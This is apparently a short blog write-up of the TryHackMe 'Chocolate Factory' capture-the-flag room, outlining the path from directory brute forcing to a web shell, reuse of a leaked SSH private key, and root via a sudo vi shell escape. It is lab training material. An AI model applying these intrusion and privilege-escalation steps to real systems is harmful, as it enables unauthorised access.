https://tryhackme.com/room/chocolatefactory

  • Directory brute forcing exposes a page intended only to be found after authentication.  This page is a web shell and allows Arbitrary Remote Code Execution
  • A private SSH key was found and allowed a remote SSH connection to be made.
  • Poor sudo configuration allows the low-level user to run /bin/vi as root without password.
  • Vi can spawn a shell; since it was run with sudo, the spawned shell is in context of root user. 
  • Instead of a root.txt flag, there is a root.py script with an encrypted flag.  The key to decrypt can be found in the web server directory. 

Here, dirsearch.py uses the default dicc.txt wordlist.  

/home.php is a webshell that allows Remote Code Execution

  • I tried bash reverse shell and uploading a msfvenom-created reverse shell but neither worked.

/validate.php exposes user credentials, although they are useless and contribute nothing.

The private key can be saved to attacker machine and ssh -i <private key> <target> to use the private key for remote ssh connection. 

The user flag is in the home folder

Sudo misconfiguration allows the low privilege user to run /bin/vi as root without password.

Can escape vi and spawn a shell as root (https://gtfobins.github.io/gtfobins/vi/#sudo)

 

Root user has access to /root/root.py which asks for a key.

The key is found in /var/www/html/key_rev_key

Once key is entered, flag is revealed.

Leave a Reply